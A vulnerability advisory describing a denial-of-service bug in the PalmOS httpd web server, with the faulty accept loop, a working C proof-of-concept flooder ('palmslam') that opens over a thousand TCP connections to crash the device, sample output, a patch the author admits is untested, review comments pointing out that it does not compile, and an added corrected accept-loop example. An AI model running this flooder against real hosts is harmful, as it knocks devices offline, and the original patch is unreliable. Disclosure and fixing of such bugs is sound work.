PalmOS httpd accept() queue overflow DoS vulnerability.


'httpd' for PalmOS was originally written by Jim Rees,
and is a simple web server for Palm-powered PDAs.
Since the development of httpd for Palm stopped, I
decided to modify 'httpd' slightly, and re-release it
on freshmeat.net.
However, httpd contains a bug which causes the device
to crash due to a "Fatal Error".  The slightly
modified version of 'httpd' (called palmhttpd)
contains the same bug as the original, as I used Jim's

The bug

The bug allows a remote attacker to crash the entire
device with a "Fatal Error", rendering it unusable
until it is reset completely.  PalmOS can only handle
one client connection at a time (so the PalmOS
programming documentation states), but 'httpd' calls
accept() inside a while(1) loop and so keeps taking
connections.  Once more connections are pending than
the stack can queue, the device stops with the dialog
"Fatal Alert NetStack1.c, Line 4XXX, overflowed accept
queue", whose only option is a "Reset" button.  The
alert text itself names the failure: the accept queue
overflowed.

Below is the offending code:

---from httpd.c

    while (1) {          /* Cause of the bug is here!
                            PalmOS can only accept 1 client connection! */
        if (f) {
            f = NULL;
        }
        if (fd >= 0) {
            fd = -1;
        }

        /* Accept connections */
        len = sizeof saddr;
        AppNetTimeout = SysTicksPerSecond() * 1;
        if ((fd = accept(sfd, (struct sockaddr *) &saddr, &len)) < 0) {
            /* ... remainder of the loop body not reproduced here ... */

Exploiting this DoS vulnerability will crash PalmOS

The exploit

Here is a PoC exploit for the issue:

/* PalmOS httpd accept queue overflow PoC exploit.
 * Compile: gcc palmslam.c -o palmslam
 * Usage:   ./palmslam <host> <port>
 * Opens up to MAX_CON TCP connections to the target and leaves
 * them open until the process exits; the device faults as soon
 * as its accept queue overflows.
 * -shaun2k2
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define MAX_CON 1025

int main(int argc, char *argv[]) {
        int sock[MAX_CON];
        struct sockaddr_in dest[MAX_CON];
        struct hostent *host;
        int i;

        if(argc < 3) {
                printf("Usage: palmslam <host> <port>\n");
                exit(1);
        }

        /* gethostbyname() signals failure with NULL, not -1 */
        if((host = gethostbyname(argv[1])) == NULL) {
                printf("Couldn't resolve %s!\n", argv[1]);
                exit(1);
        }

        /* the arrays hold MAX_CON entries, indexed 0..MAX_CON-1 */
        for(i = 0; i < MAX_CON; i++) {
                if((sock[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                        printf("Couldn't create socket!\n");
                        exit(1);
                }

                memset(&dest[i], 0, sizeof dest[i]);
                dest[i].sin_family = AF_INET;
                dest[i].sin_port = htons(atoi(argv[2]));
                dest[i].sin_addr = *((struct in_addr *)host->h_addr);

                /* every connection stays open; the loop ends only when
                 * MAX_CON are up or the target stops answering */
                if(connect(sock[i], (struct sockaddr *)&dest[i],
                           sizeof(struct sockaddr)) == -1) {
                        printf("Couldn't connect to %s on port %s!\n",
                               argv[1], argv[2]);
                        exit(1);
                }

                printf("%d : Connected!\n", i);
        }

        return 0;
}
I connected my Sony CLIE to the net via a simple pppd
script, ran palmhttpd, and ran the PoC exploit against

[root@localhost DoS]# ./palmslam 6X.XX.68.XX 80
0 : Connected!
1 : Connected!
2 : Connected!

At this point, my CLIE's screen presented me with the
dialog box.

|              Fatal Error              |    
|                                       |
|                                       |
|  Fatal Alert NetStack1.c, Line 4XXX,  |
|  overflowed accept queue              |            
|                                       |
|                                       |
|                                       |
|                                       |
|          +-----------------+          |
|          |      Reset      |          |
|          +-----------------+          | 
|                                       |

The fix

I have written a simple patch to fix the issue:

--- httpd.c     2004-01-14 17:21:41.000000000 +0000
+++ httpd.1.c   2004-02-08 17:13:33.000000000 +0000
@@ -391,8 +391,15 @@
ifinfo.param.interfaceInfo.ipAddr, host);
     printf("Listening on %s\n", host);

-    while (1) {
-       if (f) {
+    /* Here is where the bug manifests:  PalmOS can
only take 1 client
+     * connection (according to even the PalmOS
programming documentation),
+     * but this loop accept()s connections forever. 
The loop is now commented
+     * out, fixing the bug.
+     * -Shaun2k2
+     */
+        /*while (1) {*/
+       if (f) {
            f = NULL;
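Review bot: commenting out `while (1) {` on its own leaves the loop's closing `}` (outside this hunk) unmatched, so httpd.c will not compile unless another hunk removes that brace; the brace removal belongs in the same change. Disabling the loop also turns httpd into a one-request server: after the single accept() the code falls through and stops serving. The context lines point at the narrower fix: `if (fd >= 0) {` / `fd = -1;` discards the previous descriptor without a close() visible here, so the prior connection is still held when the next accept() is issued. Keep the loop and close the accepted socket (and the open file `f`) before looping back to accept().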
@@ -507,7 +514,7 @@


 char html0[] = "HTTP/1.0 200 OK\nMIME-version:
1.0\nContent-type: %s\n\n";
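Review bot: this hunk (`@@ -507,7 +514,7 @@`) arrives with only context lines (a blank line and the `char html0[]` declaration); the changed line itself is missing, so it cannot be confirmed that it removes the loop's closing brace that the first hunk requires. Re-post the complete hunk. Separately, the visible `html0` header ends its lines with bare `\n`; HTTP/1.0 specifies CRLF line endings, and while most clients tolerate LF, a strict client may reject the response.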

Apply the patch: patch httpd.c httpd.patch

Type 'make' to recompile httpd.  Although I haven't
tested the patch, I assume it works.  Let me know if
it does not.
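As an added example (not code from this advisory, from httpd or from palmhttpd): a portable POSIX C sketch of an accept loop that holds at most one client connection at a time, closing the previous descriptor before the next accept(). The listen backlog of 1 is an assumption standing in for the single-entry accept queue the advisory attributes to PalmOS; the PalmOS NetLib API is not used, and the server, client and fork() driver are all constructed here so the whole thing runs on a loopback interface. The response header copies the style of httpd's html0 string.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Added example, not httpd's code.  Assumes POSIX sockets and fork();
 * backlog 1 models the one-pending-connection limit the advisory
 * describes for PalmOS. */

/* Listen on 127.0.0.1, ephemeral port, backlog of one pending connection.
 * Stores the chosen port; returns the listening descriptor or -1. */
static int listen_loopback(unsigned short *port_out)
{
    struct sockaddr_in sa;
    socklen_t len = sizeof sa;
    int sfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sfd < 0)
        return -1;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = 0;
    if (bind(sfd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(sfd, 1) < 0 ||
        getsockname(sfd, (struct sockaddr *)&sa, &len) < 0) {
        close(sfd);
        return -1;
    }
    *port_out = ntohs(sa.sin_port);
    return sfd;
}

/* Corrected accept loop: the previous client is closed before the next
 * accept(), so two client sockets are never held at once.  Serves
 * n_clients requests and returns how many were answered. */
static int serve_one_at_a_time(int sfd, int n_clients)
{
    int fd = -1, served = 0;
    for (int i = 0; i < n_clients; i++) {
        struct sockaddr_in peer;
        socklen_t len = sizeof peer;
        char req[256];
        ssize_t n;
        const char *resp;
        if (fd >= 0) {                 /* release the previous client first */
            close(fd);
            fd = -1;
        }
        fd = accept(sfd, (struct sockaddr *)&peer, &len);
        if (fd < 0)
            break;
        n = read(fd, req, sizeof req - 1);
        if (n <= 0)
            continue;
        req[n] = '\0';
        resp = strncmp(req, "GET ", 4) == 0
                   ? "HTTP/1.0 200 OK\nMIME-version: 1.0\nContent-type: text/plain\n\nok\n"
                   : "HTTP/1.0 400 Bad Request\n\n";
        if (write(fd, resp, strlen(resp)) == (ssize_t)strlen(resp))
            served++;
    }
    if (fd >= 0)
        close(fd);
    return served;
}

/* One client connection: send a request, read until the server closes,
 * return the parsed HTTP status code or -1 on failure. */
static int client_request(unsigned short port, const char *request)
{
    struct sockaddr_in sa;
    char buf[512];
    size_t got = 0;
    ssize_t n;
    int status = -1;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0 ||
        write(fd, request, strlen(request)) < 0) {
        close(fd);
        return -1;
    }
    while (got < sizeof buf - 1 && (n = read(fd, buf + got, sizeof buf - 1 - got)) > 0)
        got += (size_t)n;
    buf[got] = '\0';
    close(fd);
    if (sscanf(buf, "HTTP/1.0 %d", &status) != 1)
        return -1;
    return status;
}

/* Fork the server, run n sequential clients with the same request, return
 * how many replies carried want_status (-1 if the server did not answer
 * every client). */
int run_clients(int n, const char *request, int want_status)
{
    unsigned short port;
    int sfd = listen_loopback(&port), matched = 0, st;
    pid_t pid;
    if (sfd < 0)
        return -1;
    pid = fork();
    if (pid < 0) {
        close(sfd);
        return -1;
    }
    if (pid == 0)
        _exit(serve_one_at_a_time(sfd, n));
    close(sfd);                        /* parent keeps only the client side */
    for (int i = 0; i < n; i++)
        if (client_request(port, request) == want_status)
            matched++;
    if (waitpid(pid, &st, 0) < 0 || !WIFEXITED(st) || WEXITSTATUS(st) != n)
        return -1;
    return matched;
}

int main(void)
{
    printf("GET requests answered 200: %d\n", run_clients(5, "GET / HTTP/1.0\n\n", 200));
    printf("bogus requests answered 400: %d\n", run_clients(3, "BOGUS\n", 400));
    return 0;
}
```

The point of the loop is the order of operations: close the old descriptor, then accept() the next one, so the server itself never contributes a second live connection to the queue. What a client can still do by opening many connections in parallel is a separate matter, and on a stack that aborts when its accept queue overflows there is no server-side code that can prevent it.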

I will be uploading a patched version of palmhttpd to


This vulnerability was discovered by shaun2k2 / Shaun

Thank you for your time.

